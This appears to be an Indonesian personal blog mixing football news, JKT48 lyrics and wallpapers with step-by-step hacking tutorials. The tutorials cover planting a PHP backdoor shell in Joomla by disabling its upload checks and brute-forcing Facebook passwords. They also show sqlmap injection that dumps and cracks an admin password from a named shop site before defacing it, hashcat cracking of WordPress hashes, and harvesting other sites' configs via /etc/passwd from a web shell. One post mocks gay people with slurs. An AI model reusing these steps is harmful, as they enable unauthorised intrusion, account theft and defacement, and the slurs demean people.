Hasil Akhir Real Madrid vs Dortmund | 2nd Leg Liga Champions

Madrid berhasil menang. Namun tidak lolos ke final. Ya, itu sangat menyakitkan. Madrid kalah agregat 4-3 setelah hanya mampu menang dengan skor 2-0 di Bernabeu. Gol Real Madrid dicetak oleh Benzema dan Sergoi Ramos.



Seperti yang sudah diduga sebelumnya, totalitas Madridista emmamng terlihat. Tanpa henti mereka menyemangati Madrid agar bisa memenangkan pertandingan dengan skor minimal 3-0.



Bermain menyerang, Real Madrid mendapat peluang pertamanya di menit ke 4 lewat tembakan Gonzalo Higuain. Namun sayang masih bisa diblok.



Meski terus menyerang, skor 0-0 bertahan hingga turun minum. MAdrid seperti tidak mampu menjebol tembok yang dibangun Dortmund.



Di menit 49, tembakan Lewandowski masih membentur mistar gawang. Real Madrid selamat.



Untuk menambah intensitas serangan, Mou memasukkan Kaka dan Benzema. Namun gol tak juga datang.

Akhirnya sang super sub mencetak gol untuk membawa Real Madrid unggul. Adalah Benzema yang menceploskan bola ke gawang Dortmund setelah menerima umpan cantik Kaka'.



Harapan muncul kembali saat di menit 87 Sergio Ramos mencetak gol kedua Madrid setelah menerima umpan Benzema. NAmun sayangnya waktu berkata lain. Skor 2-0 bertahan hingga laga usai dan Real Madrid gagal lolos ke Final Liga Champions.

Download Lagu JKT48 River [Clean Version]

Agak susah sih nyari Lagu JKT48 River. Namun terasa begitu mudah setelah JKT48 membawakannya di Konser di Nippon Budokan.

Tinggal format ulang, dua kali kompres, akhirnya berhasil juga. Lagian pas di Nippon Budokan suara chant juga nggak kedengeran di tengah lagu. Jadi agak ringan tugas buat convert nya.

Kalo yang studio version memang belum ada. Konsernya aja baru tiga hari yang lalu. Kalo udah ada langsung gue share di blog deh. Tapi yang ini tetep clean version kok.



Nih Lirik Lagunya : Lirik Lagu JKT48 River



JKT!

48!



teruslah maju!! got it!

jangan berhenti! got it!

tujuan kita dimana tempat matahari terbit

berjalan menuju harapan!



yg menghalangi jalan ini RIVER! RIVER! RIVER!

yg panjang dan jauh RIVER!

takdir iti RIVER!RIVER!RIVER!

Sebuah Pilihan RIVER!



Buang semua keraguan kalian!

tunjukan kemauan keras kalian!

jangan pernah ragu!

pasti

satu langkah kedepan! percaya pada dirisendiri!



Forward forward!

Go straight ahead!

Sebrangi sungai itu!! Ho!Ho!Ho!Ho!



mimpi itu selalu

terlihat jauh sekali

terasa sangat jauh hingga sulit dicapai

ambilah batu



dibawah kakimu itu

dan dengan semua kekuatanmu

lemparkanlah yg jauh!



sebelum matamu melihat

sungai yg meluap

terlihat, sungai yg besar

gelap, dalam, biarpun itu



lebih curam, biarpun itu

jangan takut, ok?

jangan menyerah

itu benar, lawan ada disana



jadi, percaya diri lah

didalam kegelapan

terus berenang!

jangan menyerah! Ho!Ho!Ho!Ho!



jika kau buka tanganmu, disana

masa depan terbuka, kau lihat

jangan pernah menyerah pada apa yg tak bisa

kau gapai!



batu yg kau lemparkan

adalah mimpi yg terwujid

sesuatu suara yg keluar tak bisa didengar





Ada sungai juga

Di dalam hatimu

Sungai masa-masa sulit

Walau ada hal-hal yang tak berjalan dengan lancar

Walau terkadang kau merasa tenggelam

Coba lagi

Jangan menyerah

Disana ada tepi sungai

Suatu hari kau pasti akan tiba disana



Pahami hal itu

Sungai!



Jangan membuat alasan untuk dirimu sendiri

Kau tak akan tahu hingga mencobanya

Tak ada jalan lain kecuali maju lurus ke depan



Teruslah berjalan

Selalu, dan untuk selamanya

Lalui jalan yang telah kau pilih



Ada sungai

Tepat di depan matamu

Satu sungai yang besar dan lebar

Walaupun dalam dan gelap

Walaupun arusnya cepat

Kau tak perlu cemas

Mungkin jauh

Tapi, ya, ada tepi sungai disisi lain

Lebih percayalah terhadap dirimu sendiri



Ada sungai juga

Di dalam hatimu

Sungai masa-masa sulit

Walau ada hal-hal yang tak berjalan dengan lancar

Walau terkadang kau merasa tenggelam

Coba lagi

Jangan menyerah

Disana ada tepi sungai

Suatu hari kau pasti akan tiba disana



Seberangi sungai itu!

Kau bisa melakukannya!





Nih Link Downloadnya :

Klik link dibawah :

Download Lagu River JKT48 Clean Version



Download MP3 River JKT48 , Download Lagu JKT48 River Studio Version , Download Lagu JKT48 River Clean Version, Download Lagu JKT48 River Kualitas tinggi, Lirik lagu River JKT48.

Mengganti Cursor di Backtrack 5

Selamat sore teman teman IDCA :D

Oke sesuai judul, ane mau bagi trik yang ane dapet hasil dari searching nih, langsung aja yah ..

Monggo disimak, yang make Windows jangan iri yaaaaa, cos ini cuma buat yang make backtrack aja :D :D :P

1. Buka terminal/console dulu om, lalu masukan perintah :

apt-get install oxygen-cursor-theme-extra

2. Tunggu proses sampek selesai, kalau sudah tinggal dibuka deh :

Klik kanan -> Change Desktop Background -> Theme -> Costumizer -> Pointer

Nah keren kan XD XD , selamat mencoba :)

Refrensi : disini

Content Creator : Bimo Septiawan

Download Windows 7 Theme Nabilah JKT48

Kali ini saya akan share Windows 7 Theme Nabilah JKT48. Nggak tau siapa kreatornya. Tapi saya mencoba berbagi ulang disini. Karena saya menemukannya dari kaskus. Langsung saja, ini SS desktop saya.

Dan kali ini saya akan share file dari Tema tersebut.

Ada empat file. Yaitu :

1. Exploreframe [agar background tema di file explorer bisa kelihatan]


2. Universal Theme Patcher [agar Windows bisa menggunakan tema ini]


3. Tema Windows 7 Nabilah


4. Satu file dokumen berisikan langkah-langkah penginstallan tema Nabilah JKT48 di Windows 7. Mulai dari Membackup data sampai penginstallan selesai.

Keempat file tersebut saya pack jadi satu. Agar lebih mudah.

Untuk filenya silahkan download disini :

Download Themes Nabilah JKT48 Untuk Windows

Password rar : maduracyber



Download Tema Windows 7 JKT48 Lengkap | Download Windows 7 Themes JKT48 | Download Tema Nabilah JKT48 Untuk Windows 7

Shell IDCA First Edition

Assalamuallaikum :D

Bingung mau share apa lagi, nih aku share SHELL aja yah ^_^

Fiturnya cukup lengkap kok :D

[+] PENAMPAKAN [+]

~# LOGIN SHELL #~

~# PENAMPAKAN SHELL #~

Password Shell :: idca

Download Here 

Happy Hacking :D

Content Creator : Bimo Septiawan

Cara Mudah Upload Shell [Pasang Backdoor] di Web Joomla

Kali ini saya akan share cara mudah upload shell di web CMS Joomla. kadang kita masih bingung saat menemukan web Joomla namun tidak tahu cara upload shell. Oleh karena itu kali ini saya akan berbagi trik upload shell di Joomla.

Step 1 :

Oke, saya anggap kalian sudah login ke Web Joomla. Klik Global Configuration.

Lihat Gambar :

Step 2:

Lalu klik bagian System :

Perhatikan sub bagian dibawahnya :

Legal Extensions (File Types) : tambahkan ekstensi php

Restrict Uploads : pilih NO

Check MIME Types : pilih NO

Legal Image Extensions (File Types) : tambahkan ekstensi php

Legal MIME Types : tambahkan image/php

Lalu klik save



Step 3:

Klik menu Media Manager

Upload Shell disitu.

Step 4 :

Sekarang kita panggil shellnya.

Lokasiya di http://[site]/images/[shell.php]

Sekarang terserah anda mau diapain tuh situs. Mau dideface terserah. :p

Sekian tutorial kali ini. Semoga bermanfaat.

Tool Hack Akun Facebook 2013

Assalamualaikum...

Nih ane punya aplikasi hack facebook (kata org2 :3) yg bisa sobat gunakan untuk menemukan password dari akun facebook orang lain :D caranya penggunaaanya sangat mudah dan simple aja kok,, yuk disimak :D untuk pengguna windows, disarankan untuk melengkapin bahan2 yg telah dilampirkan agar aplikasi tersebut bisa berjalan dengan baik :) dan sebelumnya tools ini sudah ane coba, dan masih work 100% :D

UPDATE : Not Working on Windows XP :p dan Bacanya ampe abis!!!!!!!!

Bahan - Bahan

1. Python 2.7 | Download

2. Aplikasi Hack Facebook | Download Password: Lihat

3. Wordlist | Use your brain :p (pikirkan kira2 passwordnya apaan)

4.Mechanize | Baca bagian bawah! :p

Langkah - Langkah

"Mohon sedikit meyisihkan waktunya untuk memberikan donasi, dengan cara mengklik gambar yg berlabel Sponsor.. Terimakasih "

Download dulu bahan2 lalu install Python 2.7 nya, kemudian extract file tool hack FB nya, kalo ane di extract di partisi D:\

Kemudian buka terminal sobat dan masuk ke directori D:\facebook

Setelah itu jalankan toolnya dengan cara ketik facebook.py lalu enter! masukkan email/username akun facebook target lalu enter! trus masukin juga nama file password list yg isinya merupakan kumpulan dari kombinasi kata, huruf dan angka, lalu enter!

Sekarang tinggal nunggu hasilnya, lama prosesnya tergantung dari banyaknya wordlist yg digunakan! kalo punya ane cuma 1GB, jadi sekitar beberapa menit menit aja :D

Setelah menunggu beberapa saat, ketemu dah passwordnya :D

Nah tinggal Login aja ke Facebooknya :D

Akun ini milik Onix AQua

Udah yaa, Selamat mencoba aja.. Goodluck!! :D


kalo seandainya sobat meengalami error saat menjalankan toolsnya, silahkan install Mechanize! Download disini! cara installnya via terminal masuk dulu ke directori mechanize, lalu ketik perintah : setup.py install lalu enter! liat gambar!

Note: " Semakin banyak wordlistnya semakin bagus :D karna cara kerja tools ini menebak password berdasarkan wordlist yg tersedia, usahakan buat wordlistnya se unik mungkin utk hasil yg lebih maksimal :D "

Sekian tutorial singkat dari ane, mudah2an bermanfaat yah :p

Content Creator : Onix AQua

Script Deface : Logo g3tar

Assalamualaikum,  :D

Pas ane berkunjung ke webnya om Zandy, ane nemuin tuh di postingnya "Script Deface Keren" nah ane jadi kepikiran mau bikin artikel terkait juga ^_^

Nah bagi yang mungkin belum bisa buat script sendiri ane kasih beberapa contoh script nantinya ^_^
Oke, nih yang pertama ane kasih satu dulu script deface yang keren :D , daripada pusing-pusing nyusun script langsung ambil aja script ini :D

[+] PENAMPAKAN [+]

Ambil Scriptnya DISINI

Silahkan edit sesuka kalian :D

Recode dari Scriptnya K4C3 Undetected kayaknya :D

Inilah Lima Tingkatan Dalam Dunia Hacker

Kali ini saya akan share tingkatan-tingkatan dalam dunia hacker beserta ulasan singkatnya. Apa saja itu ? Langsung saja simak penjelasan dibawah.

1. Elite

Hacker kategori ini merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistemoperasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui. Namun sangat jarang mereka merusak data-data karena mereka menaati aturan atau yang disebut Etichal Hacking.



2. Semi Elite

Hacker tipe ini  juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh Hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.



3. Developed Kiddie

Sebutan ini terutamakarena umur kelompok ini masih muda (ABG)&masih sekolah. Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya.Umumnya mereka masih menggunakan Grafik UserInterface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi. Sehingga mereka hanya bisa melakukan aksi hacking ketika menemukan bug baru dari Exploit DB atau situs-situs semacamnya.



4. Script Kiddies

Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.



5. Lamer

Rata-rata mereka belajar secara otodidak. Mereka adalah orang tanpa pengalaman ataupun pengetahuan yang terobsesesi menjadi hacker. Mereka biasanya membaca atau mendengar tentang Hacker & ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS. Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.



Kalian masuk yang mana ? Saya, lamer aja cukup. :p

Sekian artikel kali ini, semoga bermanfaat.

Download Wallpaper Nabilah JKT48 [HD]

Nabilah Ratna Ayu Azalia.

Yes, she is my oshi. Now and forever.

Udah lama ada di draft. Cuma karena ngirit postingan, biar nggak sampai kehabisan bahan, ya baru dipublish sekarang.

Wallpaper Nabilah JKT48

Sekali lagi, thanks buat kreatornya.

Download Wallpaper Nabilah Ratna Ayu Azalia

Download Wallpaper Nabilah JKT48

Download Walpaper Nabilah JKT48 HD

Sisi Berbahaya Dari Seorang Hacker

Nggak ada bahan uat posting, akhirnya blogwalking ke blog temen nemu artikel buat dijadikan refrensi. Kali ini saya akan menguak sisi "berbahaya" dari seorang hacker. Pernahkah anda cermati, saat seorang defacer meninggalkan pesan di halaman defacenya, ada kalimat yang berbunyi "My Evil Side Maybe Very Dangerous !" .

Yang kita bahas disini adalah kata "Very Dangerous". Saya yang seorang nwebie tolol ini awalnya berpendapat, ya jelas lah hacker itu berbahaya. Bayangkan saya, selain bisa merusak web, hacker juga bisa membuat virus. Apalagi virusnya bisa dikirim ke komputer korban buat nyuri password. WOW banget kan [lagi-lagi saya harus mengakui kehebatan Master Andre Aprilio].

Tapi setelah agak lama ikut menyimak dunia "suram" [underground] akhirnya saya sadar bahwa sisi berbahaya seorang hacker bukanlah kehebatannya menyusup ke jaringan tanpa diketahui, melainkan karena dia MAHO !!!!

Ini buktinya :

L.O.L !

Di skrinsut diatas terlihat jelas bahwa orang yang bernama ????? ???????? sedang melakukan percakapan dengan Yuyud. Sekedar info, Yuyud  disini cuma korban. Dia tidak maho karena sudah punya pacar bernama Nabilah Ratna Ayu Azalia [Nabilah JKT48]. Dan si  ????? ???????? juga laki-laki. [Sudah saya cek diprofilnya].

Dan lihatlah emo yang dia berikan kepada si Yuyud. OMG, dia memberikan smiley "maaf" mencium !!! Padahal dia laki-laki dan Yuyud juga laki-laki. Dari situlah bisa disimpulkan bahwa si ????? ???????? adalah MAHO PERMANEN. Mungkin efek dia belum pernah melihat wanita [selain ibunya] seumur hidup.



Namun itu belum seberapa. Ada yang lebih ekstrim menyebut dirinya maho.

Ngaku maho cok !!

Sekarang kalian percaya kan kalo hacker itu berbahaya. Itulah mengapa saya tidak mau menjadi hacker.



Intinya, arti dari "My Evil side Maybe Very Dangerous" adalah :

"My Evil Side" : Evil Side yang dimaksud disini mungkin karena sifatnya yang suka menggoda laki-laki lain, apalagi yang sudah punya pacar. [terlihat dari smiley ciuman di screenshoot]

"Maybe Very Dangerous" : Ya jelas Dangerous lah. Pasti orang normal akan merasa risih jika digoda sesama jenis -_- . Ini jelas berbahaya untuk kelangsungan hidup [Jika berkelanjutan bisa menyebabkan Trauma Berat atau cacat mental].



Sekian postingan sebelum subuh kali ini. Buat yang jadi objek penelitian, jangan tersinggung ya om,karena ini fakta. :p



Thanks to maho Tintonz-x207 buat artikel inspirasinya.



Hacker itu berbahaya

Sisi Berbahaya seorang hacker

Mengapa hacker berbahaya ?

Hacker itu maho

Hacker Gay



Copas tanpa sumber, siap-siap ente kena santetnya Eyang Cubur cok !!

Cara Mengundang Seluruh Teman Untuk Like FP Kamu

Assalamualaikum :)

Kali ini ane mau share tutorial tentang "Trik Facebook" hehe , sekali kali main main ke facebook lah bosen kalo mpes mpes mulu KWOKWOKWO ..

oke sekarang ane mau share trik "AUTO INVITE LIKE FANS PAGE FB" , nah maksudnya apaan coba ?

itu loh kayak kita mengundang temen kita buat like FP kita, nah kalo mau invite semua kan capek tuh temen juga udah bejibun banyaknya KWOKWOKW XD

Nih gua kasih tips/trik biar gak perlu capek capek :)

1. Login ke akun facebook kalian :D
2. Pergi ke Fans Page yang ingin kalian auto invite (*HARUS JADI ADMIN DULU)
3. Sekarang klik "Undang Teman" -> Klik "Semua Teman"
4. Setelah itu SCROLL deh sampek mentok kebawah atau terserah ente deh mau sampek mana :*
5. Setelah itu silahkan ketikan/klik :

• GOOGLE CHORME -> Klik Kanan -> Inspect Element -> Console
• MOZILLA FIREFOX -> CTRL + SHIFT + K

6. Masukan SCRIPT INI ::

SCRIPT REMAS SAYA :* | Join DISINI biar bisa lihat scriptnya

-- SCRIPTNYA GAK BISA DI TULIS DI SINI (kepotong), maaf yaa --

(delok hasile gambar)

7. Setelah script dimasukan silahkan tekan ENTER :D (*maka hasilnya akan seperti ini)

8. Tinggal klik KIRIM deh ^_^

Nah kan apa gua bilang, sekarang gak perlu capek capek Klik 1/1 teman kita ^_^

Selamat mencoba :*

Content Creator : Bimo Septiawan

Tags : Auto Invite, Cara Cepat Dapat Like Banyak, Auto , Bot Invite, Script Invite, Trik FP, Trik FB

Deface Dengan SQLMAP di WINDOWS 7

Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+] BAHAN [+]

• Python [tonjok saya]
• Sqlmap [remas saya]
• Dork : inurl:/.php?*id=

[+] LANGKAHNYA MBAH BRO [+]

Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir  url target, contoh : http://vana-shop.com/product.php?c=1 saya tambahin ' menjadi

• http://vana-shop.com/product.php?c=1' , nah kalo vuln nanti ada tulisan "you have an erro ...." mysql error dan sebagainya"

sekarang waktunya di hajar kalo udah ketemu web yang vuln :P

1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan :

• cd\sqlmap\ , maka hasilnya akan seperti ini :

2. Stelah itu, kalian mulailah scan website target dengan perintah :

• sqlmap.py -u http://www.BUGWEBTARGET.com --dbs

Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs , klik [ENTER]

3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :

• sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables , maka hasilnya akan seperti ini :

4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (*cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :

• sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns

Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns , tekan enter maka hasilnya akan seperti ini :

5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :

• sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump

Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump , klik enter 

 Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :

• do you want to crack them via a dictionary-based attack? [Y/n/q] 

Maka Hasilnya akan seperti ini :

nah itu kita dapetin User + Passwordnya :D

User : admin

Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :

• Tujuan Pertama
• Tujuan Kedua
• Tujuan Ketiga
• Tujuan Keempat
• Tujuan Keenam

Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D

http://www.vana-shop.com/admin/

HASIL : 

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Sama kan kayak make BACKTRACK 5 :D

Semoga berhasil :)

Content Creator : Bimo Septiawan a.k.a Cyber404

Deface Dengan SQLMAP di Backtrack 5

Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+} BAHAN [+]

• Python | Available on Backtrack
• Sqlmap | Available on Backtrack

[+] LANGKAHNYA MAS BRO [+]

(*Untuk Windows kalian cari dulu ke sini )

1. Kita cari dulu target yang mau kita scan (*jika ada bugs akan seperti ini)

2. Buka dulu SQLMAPnya, kalo di Backtrack 5 ketikan printah

• cd /pentest/web/scanners/sqlmap /

3. Ketikan printah ini :

• python sqlmap.py -u http://www.BUGWEBTARGET.com --dbs

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs

setelah itu klik enter, maka akan muncul Database Target (*See Image)

4. Setelah dapet nama Data Basenya kita ketikan printah :

• python sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables  [tekan enter] hasil :

5. Setelah dapat table pada databasenya silahkan cari table yang menurut kalian ada USER + PASS website tersebut, kali ini saya coba scan TABLE USER, dengan perintah :

• python sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns

Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns [lalu tekan ENTER] maka hasilnya akan seperti ini :

6. Setelah itu kita scan lagi table itu untuk mendapatkan user dan pass admin website, dengan perintah :

• python sqlmap.py -u http://www.target.com -D nama_database -T table --dump

Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump [tekan ENTER]

Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip"

• do you want to crack them via a dictionary-based attack? [Y/n/q] maka hasilnya :

nah itu kita dapetin User + Passwordnya :D

User : admin

Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :

• Tujuan Pertama
• Tujuan Kedua
• Tujuan Ketiga
• Tujuan Keempat
• Tujuan Keenam

Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D

http://www.vana-shop.com/admin/

HASIL : 

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Semoga berhasil :)

Content Creator : Bimo Septiawan a.k.a Cyber404

Download Wallpaper Melody JKT48 [HD]

Kemarin dapet Wallpaper Melody JKT48 dari temen. Nggak tau sih ini lama atau yang baru. Tapi siapa tau ada yang belum punya. Makanya langsung di share di blog.

Ini Wallpapernya :

Wallpaper Melody JKT48

Cocok buat background desktop. Udah gue coba. Pas. Gambarnya nggak pecah.

Dan terakhir, thanks buat kreatornya. :v



Wallpaper Melody JKT48

Foto Keren Melody JKT48

Desktop Background Melody JKT48

Crack Hash MD5(wordpress) dengan Hashcat

Assalamualaikum.. :)

Hay Sobat, ketemu lagi dahh :D Pernah liat yg seperti dibawah ini? :D

$P$B12345678SK.X5r1iISZN0baAvEvEj0
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.

Nah, ane sekarang mau share tentang trik bagaimana ngecrack password hash yang digunakan pada web yg menggunakan CMS Wordpress. Soalnya ane liat banyak sekali yang masih bingung bagaimana caranya bahkan ga tau sama sekali tentang password hash wordpress. berbeda dengan password hash MD5 rata2 tools decript/crack nya udah bertebaran dimana-mana baik offline maupun online. 

Saran ane kalo mau bisa crack password hash harus tau dulu jenis-jenis hash tersebut. silahkan sobat cari dah di google banyak berserakan :D banyak baca banyak ilmu :p

Cukup dah ngomel ngomelnya :D langsung ke TKP :D

Sediakan Bahan - Bahan :

1. Hashcat | Download Password: Lihat

2.Wordlist | Download | Download

3.Sedikit Otak, dan Kesabaran :p

Langkah - Langkah:


Pertama extrack file hashcat dan wordlist dipartisi disk yg sobat inginkan, kalo ane disini ane letak di partisi D:\ liat gambar baik2 tuh :D

Lalu buka Hashlist.txt dan masukkan Hash yg mau sobat crack, dan save lagi :D

Selanjutnya buka terminal command, cari aja di Start>Run>ketik cmd! dan enter!

Setelah terminal terbuka, posisikan directori ke folder D:\Hashcat. liat gambar!

Selanjutnya ketik perintah : hashcat-cli32.exe -m 400 hashlist.txt wordlist.txt  lalu enter!

Silahkan sobat tunggu beberapa tahun yah :D eh, beberapa saat :D tunggu ampe selesai aja ;)

Nah tuw, udah keluar hasilnya :


$P$B12345678SK.X5r1iISZN0baAvEvEj0:l4I2GL4HsK7Tw
$P$B12345678ZiFnCoy7w6GTPrB3CkpqJ0:r3dm0nd_admin
$P$B12345678WCBznPM8xM5iD8Z.SLgTx/:4dm!n_w38
$P$B123456784oLOGhf1nRTZQ/lvWT8mc0:w38m45t3r
$P$B12345678JC/b3vIsxnmQm5u2XkFKq.:!nd0n3s!4n_cy83r_4rmy

Note: "Biar lebih maknyoooss, banyakin aja wordlistnya :D punya ane ampe 1 GB :3"

Jika sobat ingin meggunakan perintah2 yg lain atau mau coba crack hash jenis yg lain, silahkan sobat ketik perintah :  hashcat-cli32.exe --help

Sekian tutorial singkat dari ane, kalo ada yg kurang mohon dikoreksi, ntar ane perbaiki :D

Wasalamualaikum..

Contet Creator: Onix AQua

Cara Mudah mendapatkan Config Sebuah Website

ketika melakukan deface, adakalanya kita juga bisa mendapatkan seluruh akun yang berada pada satu server dengan we yang pertama. Lalu bagaimana cara untuk mendapatkannya ? Kita pasang Config. Cara pasangnya gimana ? Mudah kok. Ikuti saja tutorial yang saya berikan.

Pada tutorial ini saya menggunakan shell Injection. Jika kalian menggunakan shell lain silahkan menyesuaikan sendiri.

Saya anggap kalian sudah memasang shell pada web korban. Sehingga pada tutorial kali ini saya langsung membahas bagaimana cara mendapatkan confignya.



Step 1

Klik Menu EVAL

Step 2 :

Anda akan melihat tulisan echo file_get_contents('/etc/passwd');

Lihat saja pada gambar. Lalu klik GO

Step 3 :

Lihat saja di gambar. Tutorial ada di gambar .

Ingat, copy semuanya.



Step 4 :

Lalu kik menu Config.

Pastekan semua data yang didapat pada Step 3.

Lalu klik Hajar pada bagian bawah.



Step 5 :

Done !

Step 6 :

Sekarang kita panggil config nya. Caranya ? kita ganti nama shell di url dengan kata config.

Contoh : www.situs.com/folder/shell.php . Ubah menjadi www.situs.com/folder/config

Dan hasilnya :

Indahnya dunia ini.......

Ada puluhan situs yang siap dihajar. :v



Step 7 :

Sekarang tinggal kita login ke MySQL.

Klik menu MySQL di shell Injection.

Oke. Kalo sidah kek gitu masa masih mau tanya ? Udah cukup kan ? Sekian tutorial kali ini. Semoga bermanfaat.



Copas tanpa Sumber = Bakal gue laporin ke Eyang Subur cok !!!